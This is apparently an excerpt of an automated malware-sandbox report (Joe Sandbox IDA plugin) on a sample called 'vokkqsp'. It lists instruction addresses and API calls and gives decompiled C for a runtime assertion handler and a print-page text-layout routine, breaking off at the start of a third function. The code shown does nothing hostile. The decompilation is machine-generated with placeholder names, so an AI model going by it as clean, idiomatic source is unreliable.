                                                      0x0040c18c
                                                      0x00000000
                                                      0x0040c192
                                                      0x0040c192
                                                      0x0040c197
                                                      0x0040c199
                                                      0x0040c19e
                                                      0x0040c1a1
                                                      0x0040c1a3
                                                      0x00000000
                                                      0x0040c1a9
                                                      0x0040c1a9
                                                      0x0040c1ae
                                                      0x0040c1b0
                                                      0x0040c1b5
                                                      0x0040c1b8
                                                      0x0040c1ba
                                                      0x00000000
                                                      0x0040c1c0
                                                      0x0040c1c0
                                                      0x0040c1c6
                                                      0x0040c1c8
                                                      0x0040c1cb
                                                      0x0040c1cb
                                                      0x0040c1ce
                                                      0x0040c1d1
                                                      0x0040c1d1
                                                      0x0040c1dc
                                                      0x0040c1e1
                                                      0x0040c1e4
                                                      0x0040c4ee
                                                      0x00000000
                                                      0x0040c1ea
                                                      0x0040c1ea
                                                      0x0040c1ec
                                                      0x0040c1ef
                                                      0x0040c1ef
                                                      0x0040c1f2
                                                      0x0040c1f5
                                                      0x0040c1f5
                                                      0x0040c200
                                                      0x0040c20a
                                                      0x0040c20e
                                                      0x0040c20f
                                                      0x0040c214
                                                      0x0040c21b
                                                      0x0040c220
                                                      0x0040c226
                                                      0x0040c229
                                                      0x0040c22b
                                                      0x0040c22b
                                                      0x0040c22f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040c231
                                                      0x0040c233
                                                      0x0040c235
                                                      0x0040c238
                                                      0x0040c239
                                                      0x0040c23c
                                                      0x0040c23e
                                                      0x0040c245
                                                      0x00000000
                                                      0x00000000
                                                      0x0040c245
                                                      0x00000000
                                                      0x0040c233
                                                      0x0040c247
                                                      0x0040c24a
                                                      0x0040c24a
                                                      0x0040c252
                                                      0x0040c254
                                                      0x0040c25a
                                                      0x0040c25d
                                                      0x0040c2a9
                                                      0x00000000
                                                      0x0040c2af
                                                      0x0040c2b1
                                                      0x0040c2b2
                                                      0x0040c2b6
                                                      0x0040c2bc
                                                      0x0040c2c0
                                                      0x0040c2c5
                                                      0x0040c2c8
                                                      0x0040c2ca
                                                      0x00000000
                                                      0x0040c2d0
                                                      0x0040c2d0
                                                      0x0040c2d5
                                                      0x0040c2d7
                                                      0x0040c2dc
                                                      0x0040c2df
                                                      0x0040c2e1
                                                      0x00000000
                                                      0x0040c2e7
                                                      0x0040c2e7
                                                      0x0040c2e7
                                                      0x0040c2f3
                                                      0x00000000
                                                      0x0040c2f3
                                                      0x0040c2e1
                                                      0x0040c2ca
                                                      0x0040c25f
                                                      0x0040c25f
                                                      0x0040c262
                                                      0x0040c486
                                                      0x0040c486
                                                      0x0040c48b
                                                      0x0040c490
                                                      0x0040c493
                                                      0x0040c495
                                                      0x00000000
                                                      0x0040c497
                                                      0x0040c497
                                                      0x0040c49c
                                                      0x0040c49e
                                                      0x0040c4a3
                                                      0x0040c4a6
                                                      0x0040c4a8
                                                      0x00000000
                                                      0x0040c4aa
                                                      0x0040c4aa
                                                      0x0040c4b6
                                                      0x0040c4be
                                                      0x0040c4c3
                                                      0x0040c4c6
                                                      0x0040c4c8
                                                      0x00000000
                                                      0x0040c4ca
                                                      0x0040c4ca
                                                      0x0040c4cf
                                                      0x0040c4d1
                                                      0x0040c4d6
                                                      0x0040c4d9
                                                      0x0040c4db
                                                      0x00000000
                                                      0x0040c4dd
                                                      0x0040c4e6
                                                      0x00000000
                                                      0x0040c4e6
                                                      0x0040c4db
                                                      0x0040c4c8
                                                      0x0040c4a8
                                                      0x0040c268
                                                      0x0040c26a
                                                      0x0040c26d
                                                      0x0040c271
                                                      0x0040c276
                                                      0x0040c279
                                                      0x0040c27b
                                                      0x00000000
                                                      0x0040c281
                                                      0x0040c281
                                                      0x0040c286
                                                      0x0040c288
                                                      0x0040c28d
                                                      0x0040c290
                                                      0x0040c292
                                                      0x00000000
                                                      0x0040c298
                                                      0x0040c29e
                                                      0x0040c2a4
                                                      0x0040c2f6
                                                      0x0040c2f6
                                                      0x0040c2f7
                                                      0x0040c2f7
                                                      0x0040c2f9
                                                      0x0040c2fe
                                                      0x0040c301
                                                      0x0040c303
                                                      0x00000000
                                                      0x0040c309
                                                      0x0040c309
                                                      0x0040c30e
                                                      0x0040c310
                                                      0x0040c315
                                                      0x0040c318
                                                      0x0040c31a
                                                      0x00000000
                                                      0x0040c320
                                                      0x0040c320
                                                      0x0040c325
                                                      0x0040c327
                                                      0x0040c32c
                                                      0x0040c32f
                                                      0x0040c331
                                                      0x00000000
                                                      0x0040c337
                                                      0x0040c337
                                                      0x0040c339
                                                      0x0040c33b
                                                      0x0040c33e
                                                      0x0040c33e
                                                      0x0040c341
                                                      0x0040c344
                                                      0x0040c344
                                                      0x0040c349
                                                      0x0040c349
                                                      0x0040c34b
                                                      0x0040c34d
                                                      0x0040c34f
                                                      0x0040c352
                                                      0x0040c352
                                                      0x0040c355
                                                      0x0040c358
                                                      0x0040c358
                                                      0x0040c365
                                                      0x0040c373
                                                      0x0040c378
                                                      0x0040c37b
                                                      0x0040c37d
                                                      0x00000000
                                                      0x0040c383
                                                      0x0040c383
                                                      0x0040c388
                                                      0x0040c38a
                                                      0x0040c38f
                                                      0x0040c392
                                                      0x0040c394
                                                      0x00000000
                                                      0x0040c39a
                                                      0x0040c39a
                                                      0x0040c39f
                                                      0x0040c3a1
                                                      0x0040c3a6
                                                      0x0040c3a9
                                                      0x0040c3ab
                                                      0x00000000
                                                      0x0040c3b1
                                                      0x0040c3b1
                                                      0x0040c3b3
                                                      0x0040c3b5
                                                      0x0040c3b8
                                                      0x0040c3b8
                                                      0x0040c3bb
                                                      0x0040c3be
                                                      0x0040c3be
                                                      0x0040c3c3
                                                      0x0040c3c3
                                                      0x0040c3c7
                                                      0x0040c3cd
                                                      0x0040c3d3
                                                      0x0040c3d6
                                                      0x0040c3d6
                                                      0x0040c3d9
                                                      0x0040c3dc
                                                      0x0040c3dc
                                                      0x0040c3e7
                                                      0x0040c3ec
                                                      0x0040c3ee
                                                      0x0040c4f4
                                                      0x00000000
                                                      0x0040c3f4
                                                      0x0040c3fb
                                                      0x0040c404
                                                      0x0040c409
                                                      0x0040c40c
                                                      0x0040c40e
                                                      0x00000000
                                                      0x0040c414
                                                      0x0040c414
                                                      0x0040c419
                                                      0x0040c419
                                                      0x0040c41b
                                                      0x0040c420
                                                      0x0040c423
                                                      0x0040c425
                                                      0x00000000
                                                      0x0040c42b
                                                      0x0040c42b
                                                      0x0040c430
                                                      0x0040c431
                                                      0x0040c433
                                                      0x0040c438
                                                      0x0040c43b
                                                      0x0040c43d
                                                      0x00000000
                                                      0x0040c443
                                                      0x0040c443
                                                      0x0040c448
                                                      0x0040c44a
                                                      0x0040c44f
                                                      0x0040c452
                                                      0x0040c454
                                                      0x00000000
                                                      0x0040c45a
                                                      0x0040c45a
                                                      0x0040c45b
                                                      0x0040c45d
                                                      0x0040c462
                                                      0x0040c465
                                                      0x0040c467
                                                      0x00000000
                                                      0x0040c46d
                                                      0x0040c46d
                                                      0x0040c472
                                                      0x0040c474
                                                      0x0040c479
                                                      0x0040c47c
                                                      0x0040c47e
                                                      0x00000000
                                                      0x0040c484
                                                      0x0040c504
                                                      0x0040c50d
                                                      0x0040c50d
                                                      0x0040c47e
                                                      0x0040c467
                                                      0x0040c454
                                                      0x0040c43d
                                                      0x0040c425
                                                      0x0040c40e
                                                      0x0040c3ee
                                                      0x0040c3ab
                                                      0x0040c394
                                                      0x0040c37d
                                                      0x0040c331
                                                      0x0040c31a
                                                      0x0040c303
                                                      0x0040c292
                                                      0x0040c27b
                                                      0x0040c262
                                                      0x0040c25d
                                                      0x0040c1e4
                                                      0x0040c1ba
                                                      0x0040c1a3
                                                      0x0040c150
                                                      0x0040c150
                                                      0x0040c163
                                                      0x0040c16b
                                                      0x0040c16f
                                                      0x0040c174
                                                      0x0040c177
                                                      0x0040c179
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040c179
                                                      0x0040c10d
                                                      0x0040c11a
                                                      0x0040c11f
                                                      0x0040c122
                                                      0x0040c124
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040c124
                                                      0x0040c10b
                                                      0x0040c0b2
                                                      0x0040c09b
                                                      0x0040bc61
                                                      0x0040bc68
                                                      0x0040bc6d
                                                      0x0040bc72
                                                      0x00000000
                                                      0x0040bc78
                                                      0x0040bc7f
                                                      0x0040bc84
                                                      0x0040bc89
                                                      0x00000000
                                                      0x0040bc8f
                                                      0x0040bc9c
                                                      0x0040bca1
                                                      0x0040bca8
                                                      0x0040bcba
                                                      0x0040bcc2
                                                      0x0040bccd
                                                      0x0040bcd7
                                                      0x0040bcdd
                                                      0x0040bce2
                                                      0x0040bce7
                                                      0x0040bd0a
                                                      0x0040bd0a
                                                      0x0040bd10
                                                      0x0040bd15
                                                      0x0040bd1b
                                                      0x0040bd1b
                                                      0x0040bd1d
                                                      0x0040bd1e
                                                      0x0040bd22
                                                      0x0040bd2e
                                                      0x0040bd61
                                                      0x0040bd64
                                                      0x0040bd69
                                                      0x0040bd6e
                                                      0x00000000
                                                      0x0040bd74
                                                      0x0040bd7b
                                                      0x0040bd80
                                                      0x0040bd85
                                                      0x00000000
                                                      0x0040bd8b
                                                      0x0040bd92
                                                      0x0040bd97
                                                      0x0040bd9c
                                                      0x00000000
                                                      0x0040bda2
                                                      0x0040bda2
                                                      0x0040bda4
                                                      0x0040bda4
                                                      0x0040bda7
                                                      0x0040bda7
                                                      0x0040bda9
                                                      0x0040bdaa
                                                      0x0040bdae
                                                      0x0040bdb0
                                                      0x0040bdb6
                                                      0x0040bec5
                                                      0x0040bec5
                                                      0x00000000
                                                      0x0040bdbc
                                                      0x0040bdbc
                                                      0x0040bdbe
                                                      0x0040bdbe
                                                      0x0040bdc1
                                                      0x0040bdc1
                                                      0x0040bdc3
                                                      0x0040bdc4
                                                      0x0040bdc8
                                                      0x0040bdcc
                                                      0x0040bdcd
                                                      0x0040bdd3
                                                      0x0040bdd9
                                                      0x0040bddf
                                                      0x0040bde1
                                                      0x0040bde4
                                                      0x0040bde6
                                                      0x0040bdee
                                                      0x0040bdef
                                                      0x0040bdf0
                                                      0x0040bdf4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bdf4
                                                      0x0040bdf6
                                                      0x0040bdf9
                                                      0x0040bdf9
                                                      0x0040bdff
                                                      0x0040be04
                                                      0x0040be7f
                                                      0x00000000
                                                      0x0040be81
                                                      0x0040be81
                                                      0x0040be81
                                                      0x0040be83
                                                      0x00000000
                                                      0x0040be83
                                                      0x0040be06
                                                      0x0040be09
                                                      0x0040be89
                                                      0x0040be8b
                                                      0x0040be8e
                                                      0x0040be92
                                                      0x0040be97
                                                      0x0040be9a
                                                      0x0040be9c
                                                      0x00000000
                                                      0x0040bea2
                                                      0x0040bea9
                                                      0x0040beae
                                                      0x0040beb1
                                                      0x0040beb3
                                                      0x00000000
                                                      0x0040beb9
                                                      0x0040bebf
                                                      0x0040bebf
                                                      0x00000000
                                                      0x0040bebf
                                                      0x0040beb3
                                                      0x0040be0b
                                                      0x0040be0b
                                                      0x0040be0b
                                                      0x0040be10
                                                      0x0040be15
                                                      0x0040be1a
                                                      0x00000000
                                                      0x0040be20
                                                      0x0040be27
                                                      0x0040be2c
                                                      0x0040be31
                                                      0x00000000
                                                      0x0040be37
                                                      0x0040be45
                                                      0x0040be4a
                                                      0x0040be4f
                                                      0x0040be54
                                                      0x00000000
                                                      0x0040be5a
                                                      0x0040be61
                                                      0x0040be66
                                                      0x0040be6b
                                                      0x00000000
                                                      0x0040be71
                                                      0x0040be7c
                                                      0x0040bec6
                                                      0x0040bec6
                                                      0x0040bec7
                                                      0x0040bec8
                                                      0x0040becd
                                                      0x0040bed2
                                                      0x00000000
                                                      0x0040bed8
                                                      0x0040bedf
                                                      0x0040bee4
                                                      0x0040bee9
                                                      0x00000000
                                                      0x0040beef
                                                      0x0040bef6
                                                      0x0040befb
                                                      0x0040bf00
                                                      0x00000000
                                                      0x0040bf06
                                                      0x0040bf06
                                                      0x0040bf08
                                                      0x0040bf0b
                                                      0x0040bf0b
                                                      0x0040bf0d
                                                      0x0040bf0e
                                                      0x0040bf12
                                                      0x0040bf14
                                                      0x0040bf16
                                                      0x0040bf19
                                                      0x0040bf19
                                                      0x0040bf1b
                                                      0x0040bf1c
                                                      0x0040bf20
                                                      0x0040bf30
                                                      0x0040bf35
                                                      0x0040bf3a
                                                      0x00000000
                                                      0x0040bf40
                                                      0x0040bf47
                                                      0x0040bf4c
                                                      0x0040bf51
                                                      0x00000000
                                                      0x0040bf57
                                                      0x0040bf5e
                                                      0x0040bf63
                                                      0x0040bf68
                                                      0x00000000
                                                      0x0040bf6e
                                                      0x0040bf6e
                                                      0x0040bf70
                                                      0x0040bf73
                                                      0x0040bf73
                                                      0x0040bf75
                                                      0x0040bf76
                                                      0x0040bf7c
                                                      0x0040bf82
                                                      0x0040bf88
                                                      0x0040bf8b
                                                      0x0040bf8b
                                                      0x0040bf8d
                                                      0x0040bf8e
                                                      0x0040bf92
                                                      0x0040bf99
                                                      0x0040c015
                                                      0x00000000
                                                      0x0040bf9b
                                                      0x0040bfa2
                                                      0x0040bfab
                                                      0x0040bfb0
                                                      0x0040bfb5
                                                      0x00000000
                                                      0x0040bfb7
                                                      0x0040bfb7
                                                      0x0040bfbc
                                                      0x0040bfbc
                                                      0x0040bfbd
                                                      0x0040bfbe
                                                      0x0040bfc3
                                                      0x0040bfc8
                                                      0x00000000
                                                      0x0040bfca
                                                      0x0040bfca
                                                      0x0040bfd2
                                                      0x0040bfd7
                                                      0x0040bfdc
                                                      0x00000000
                                                      0x0040bfde
                                                      0x0040bfe5
                                                      0x0040bfea
                                                      0x0040bfef
                                                      0x00000000
                                                      0x0040bff1
                                                      0x0040bff4
                                                      0x0040bff9
                                                      0x0040bffe
                                                      0x00000000
                                                      0x0040c000
                                                      0x0040c007
                                                      0x0040c00c
                                                      0x0040c011
                                                      0x00000000
                                                      0x0040c013
                                                      0x0040c02b
                                                      0x0040c02b
                                                      0x0040c011
                                                      0x0040bffe
                                                      0x0040bfef
                                                      0x0040bfdc
                                                      0x0040bfc8
                                                      0x0040bfb5
                                                      0x0040bf99
                                                      0x0040bf68
                                                      0x0040bf51
                                                      0x0040bf3a
                                                      0x0040bf00
                                                      0x0040bee9
                                                      0x0040bed2
                                                      0x0040be6b
                                                      0x0040be54
                                                      0x0040be31
                                                      0x0040be1a
                                                      0x0040be09
                                                      0x0040be04
                                                      0x0040bdb6
                                                      0x0040bd9c
                                                      0x0040bd85
                                                      0x0040bd30
                                                      0x0040bd30
                                                      0x0040bd3c
                                                      0x0040bd4b
                                                      0x0040bd50
                                                      0x0040bd55
                                                      0x00000000
                                                      0x0040bd5b
                                                      0x0040bd5b
                                                      0x00000000
                                                      0x0040bd5b
                                                      0x0040bd55
                                                      0x0040bce9
                                                      0x0040bcfa
                                                      0x0040bcff
                                                      0x0040bd04
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bd04
                                                      0x0040bce7
                                                      0x0040bc89
                                                      0x0040bc72

                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BCBA
                                                        • Part of subcall function 00422FD2: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00422FF7
                                                        • Part of subcall function 00422FD2: GetLastError.KERNEL32 ref: 00423001
                                                        • Part of subcall function 00422FD2: __dosmaperr.LIBCMT ref: 00423008
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Module$ErrorFileHandleLastName__dosmaperr
                                                      • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
                                                      • API String ID: 4185775497-1508414584
                                                      • Opcode ID: cbbb82f89445ec28537ff6fd079da328b2ad2b8c0d30aaa12e6553ad9ea99cba
                                                      • Instruction ID: d551dd4722a1b0f24e297d26123fcc2afc7755dfa63ee9ccd7e599ce6046893b
                                                      • Opcode Fuzzy Hash: cbbb82f89445ec28537ff6fd079da328b2ad2b8c0d30aaa12e6553ad9ea99cba
                                                      • Instruction Fuzzy Hash: BAB12A71A00115F6EB295B329D42FEF7769DF96308F0401BAFD04E2286F7B98A45C99C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401814 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 242memorywindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401814(struct HDC__* __ecx, int* __edx, void* __eflags, intOrPtr _a4, int _a8, signed short** _a12) {
				int* _v8;
				struct HDC__* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct tagSIZE _v36;
				struct tagTEXTMETRICW _v96;
				void* _t81;
				signed int _t85;
				int _t88;
				void* _t105;
				int _t106;
				signed short* _t108;
				signed short* _t109;
				signed int _t112;
				signed short* _t115;
				int* _t124;
				signed int _t125;
				int _t127;
				struct HDC__* _t128;
				int _t134;
				void* _t137;
				WCHAR* _t140;
				long _t141;
				int _t147;
				short _t149;
				signed int _t150;
				signed short* _t151;
				long _t155;
				intOrPtr _t157;
				struct HDC__* _t158;
				signed short** _t159;
				long _t161;
				void* _t162;
				short _t163;
				void* _t164;

				_t124 = __edx;
				_t158 = __ecx;
				_v8 = __edx;
				_v12 = __ecx;
				_t81 = E0040171B(0x44de88, _a8);
				_v16 = _t81;
				if(_t81 != 0) {
					if(_a4 == 0 || StartPage(__ecx) > 0) {
						GetTextMetricsW(_t158,  &_v96);
						_t155 = 0;
						if( *0x44d390 == 0) {
							_t125 = 0;
						} else {
							_t125 = E004016A8(_t158, _t124, _a4, 1, 0x44d390);
						}
						_t84 = _v8;
						_t131 = _v16;
						_t127 = _t125 * _v96.tmHeight + _v8[1];
						if( *_v16 == _t155) {
							_t85 = _t155;
						} else {
							_t85 = E004016A8(_t158, _t84, _t155, _t155, _t131);
						}
						_t159 = _a12;
						_v28 = 0xa;
						_v20 = 0xd;
						_v24 = _v8[3] - _t85 * _v96.tmHeight + _t85 * _v96.tmHeight;
						do {
							_t134 = _t159[3];
							if(_t134 != 0 ||  *_t159 >= _t159[1]) {
								L27:
								if( *0x44cf7c == 0) {
									_t147 = _t159[3];
									goto L38;
								}
								goto L28;
							} else {
								while(1) {
									_t108 =  *_t159;
									_t149 =  *_t108 & 0x0000ffff;
									if(_t149 == _v28 || _t149 == _v20) {
										goto L27;
									}
									if(_t149 != 9) {
										if(_t134 >= 0x1f4) {
											L25:
											if( *0x44cf7c != 0) {
												L28:
												GetTextExtentExPointW(_v12, _t159[2], _t159[3], _v8[2] -  *_v8,  &_a8, _t155,  &_v36);
												_t147 = _a8;
												if(_t147 >= _t159[3]) {
													L39:
													if(_a4 != 0) {
														ExtTextOutW(_v12,  *_v8, _t127, 4, _v8, _t159[2], _t147, _t155);
														_t147 = _a8;
													}
													_t58 =  &(_t159[3]);
													 *_t58 = _t159[3] - _t147;
													_t88 = _t159[3];
													if( *_t58 == 0) {
														if( *_t159 >= _t159[1]) {
															goto L52;
														}
														_t157 = _v24;
														while(_t127 < _t157) {
															_t151 =  *_t159;
															_t137 = 0xa;
															_t112 =  *_t151 & 0x0000ffff;
															if(_t112 == _t137) {
																L49:
																_t127 = _t127 + _v96.tmExternalLeading + _v96.tmHeight;
																L50:
																_t115 =  &(_t151[1]);
																 *_t159 = _t115;
																if(_t115 < _t159[1]) {
																	continue;
																}
																break;
															}
															if(_t112 != _v20) {
																break;
															}
															if(_t112 != _t137) {
																goto L50;
															}
															goto L49;
														}
														_t155 = 0;
													} else {
														E0043A610(_t159[2],  &(_t159[2][_t147]), _t88 + _t88);
														_t164 = _t164 + 0xc;
														_t127 = _t127 + _v96.tmExternalLeading + _v96.tmHeight;
													}
													goto L52;
												}
												_t140 =  &(_t159[2][_t147]);
												_t105 = 0x20;
												if( *_t140 == _t105) {
													goto L39;
												}
												_t106 = _t147;
												if(_t147 == 0) {
													L35:
													if(_t106 <= 0) {
														goto L39;
													}
													_t147 = _t106 + 1;
													L38:
													_a8 = _t147;
													goto L39;
												}
												_t162 = 0x20;
												while( *_t140 != _t162) {
													_t140 = _t140 - 2;
													_t106 = _t106 - 1;
													if(_t106 != 0) {
														continue;
													}
													break;
												}
												_t159 = _a12;
												goto L35;
											}
											L26:
											_t109 =  &(_t108[1]);
											 *_t159 = _t109;
											if(_t109 < _t159[1]) {
												continue;
											}
											goto L27;
										}
										_t159[3] =  &(_t159[3][0]);
										_t159[2][_t134] = _t149;
										L24:
										_t134 = _t159[3];
										_t108 =  *_t159;
										if(_t134 < 0x1f4) {
											goto L26;
										}
										goto L25;
									}
									_t141 = _t155;
									do {
										_t150 = _t159[3];
										if(_t150 >= 0x1f4) {
											if( *0x44cf7c != 0) {
												goto L24;
											}
											goto L20;
										}
										_t163 = 0x20;
										_t159[2][_t150] = _t163;
										_t159 = _a12;
										_t159[3] = _t159[3] + 1;
										L20:
										_t141 = _t141 + 1;
									} while (_t141 < 8);
									goto L24;
								}
								goto L27;
							}
							L52:
						} while ( *_t159 < _t159[1] && _t127 < _v24);
						_t91 = _v16;
						_t128 = _v12;
						if( *_v16 != _t155) {
							E004016A8(_t128, _v8, _a4, _t155, _t91);
						}
						if(_a4 != 0) {
							EndPage(_t128);
						}
						_t161 = 1;
						goto L59;
					} else {
						MessageBoxW( *0x44cf04, L"StartPage failed", L"Print Error", 0x30);
						_t155 = 0;
						_t161 = 0;
						L59:
						HeapFree(GetProcessHeap(), _t155, _v16);
						return _t161;
					}
				}
				return _t81;
			}








































                                                      0x0040181c
                                                      0x0040181e
                                                      0x00401828
                                                      0x0040182b
                                                      0x0040182e
                                                      0x00401833
                                                      0x00401838
                                                      0x00401843
                                                      0x00401876
                                                      0x0040187c
                                                      0x00401885
                                                      0x0040189e
                                                      0x00401887
                                                      0x0040189a
                                                      0x0040189a
                                                      0x004018a4
                                                      0x004018a7
                                                      0x004018aa
                                                      0x004018b0
                                                      0x004018c0
                                                      0x004018b2
                                                      0x004018b9
                                                      0x004018b9
                                                      0x004018c9
                                                      0x004018cc
                                                      0x004018d3
                                                      0x004018e1
                                                      0x004018e4
                                                      0x004018e4
                                                      0x004018e9
                                                      0x0040196a
                                                      0x00401971
                                                      0x004019cc
                                                      0x00000000
                                                      0x004019cc
                                                      0x00000000
                                                      0x004018f2
                                                      0x004018f2
                                                      0x004018f2
                                                      0x004018f4
                                                      0x004018fb
                                                      0x00000000
                                                      0x00000000
                                                      0x00401906
                                                      0x0040193e
                                                      0x00401957
                                                      0x0040195e
                                                      0x00401973
                                                      0x0040198e
                                                      0x00401994
                                                      0x0040199a
                                                      0x004019d2
                                                      0x004019d6
                                                      0x004019e9
                                                      0x004019ef
                                                      0x004019ef
                                                      0x004019f2
                                                      0x004019f2
                                                      0x004019f5
                                                      0x004019f8
                                                      0x00401a1c
                                                      0x00000000
                                                      0x00000000
                                                      0x00401a1e
                                                      0x00401a21
                                                      0x00401a25
                                                      0x00401a29
                                                      0x00401a2a
                                                      0x00401a30
                                                      0x00401a3d
                                                      0x00401a43
                                                      0x00401a45
                                                      0x00401a45
                                                      0x00401a48
                                                      0x00401a4d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401a4d
                                                      0x00401a36
                                                      0x00000000
                                                      0x00000000
                                                      0x00401a3b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401a3b
                                                      0x00401a4f
                                                      0x004019fa
                                                      0x00401a05
                                                      0x00401a0d
                                                      0x00401a13
                                                      0x00401a13
                                                      0x00000000
                                                      0x004019f8
                                                      0x004019a1
                                                      0x004019a4
                                                      0x004019a8
                                                      0x00000000
                                                      0x00000000
                                                      0x004019aa
                                                      0x004019ae
                                                      0x004019c3
                                                      0x004019c5
                                                      0x00000000
                                                      0x00000000
                                                      0x004019c7
                                                      0x004019cf
                                                      0x004019cf
                                                      0x00000000
                                                      0x004019cf
                                                      0x004019b2
                                                      0x004019b3
                                                      0x004019b8
                                                      0x004019bb
                                                      0x004019be
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004019be
                                                      0x004019c0
                                                      0x00000000
                                                      0x004019c0
                                                      0x00401960
                                                      0x00401960
                                                      0x00401963
                                                      0x00401968
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401968
                                                      0x00401943
                                                      0x00401946
                                                      0x0040194a
                                                      0x0040194a
                                                      0x0040194d
                                                      0x00401955
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401955
                                                      0x00401908
                                                      0x0040190a
                                                      0x0040190a
                                                      0x00401913
                                                      0x0040192e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040192e
                                                      0x0040191a
                                                      0x0040191b
                                                      0x0040191f
                                                      0x00401922
                                                      0x00401930
                                                      0x00401930
                                                      0x00401931
                                                      0x00000000
                                                      0x00401936
                                                      0x00000000
                                                      0x004018f2
                                                      0x00401a51
                                                      0x00401a53
                                                      0x00401a61
                                                      0x00401a64
                                                      0x00401a6a
                                                      0x00401a76
                                                      0x00401a76
                                                      0x00401a7f
                                                      0x00401a82
                                                      0x00401a82
                                                      0x00401a8a
                                                      0x00000000
                                                      0x00401850
                                                      0x00401862
                                                      0x00401868
                                                      0x0040186a
                                                      0x00401a8b
                                                      0x00401a97
                                                      0x00000000
                                                      0x00401a9f
                                                      0x00401843
                                                      0x00401aa5

                                                      APIs
                                                        • Part of subcall function 0040171B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040177F
                                                        • Part of subcall function 0040171B: HeapAlloc.KERNEL32(00000000), ref: 00401786
                                                      • StartPage.GDI32 ref: 00401846
                                                      • MessageBoxW.USER32(StartPage failed,Print Error,00000030), ref: 00401862
                                                      • GetTextMetricsW.GDI32(?,?), ref: 00401876
                                                      • GetTextExtentExPointW.GDI32(00000000,00000000,?,00000000,?,00000000,?), ref: 0040198E
                                                      • ExtTextOutW.GDI32(00000000,?,?,00000004,?,00000000,?,00000000), ref: 004019E9
                                                      • EndPage.GDI32(00000000), ref: 00401A82
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00401A90
                                                      • HeapFree.KERNEL32(00000000,?,?), ref: 00401A97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Heap$Text$PageProcess$AllocExtentFreeMessageMetricsPointStart
                                                      • String ID: Print Error$StartPage failed
                                                      • API String ID: 1758665969-1681616764
                                                      • Opcode ID: 005b6e47b234c8f1b7f873ed1d1fa9500c0561f5a6509da431b2610b8887f0ac
                                                      • Instruction ID: cb99086c32891fc93c36744e58c72f933fe61c4ba78ab7f6afe30054a73d6f68
                                                      • Opcode Fuzzy Hash: 005b6e47b234c8f1b7f873ed1d1fa9500c0561f5a6509da431b2610b8887f0ac
                                                      • Instruction Fuzzy Hash: 5E918E75A00205EFCB20DF65C894EAFB7B6FF45300F14843AE856A72A0D778AD41CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E460 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 99%
                                                      			E0041E460(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed short* _v164;
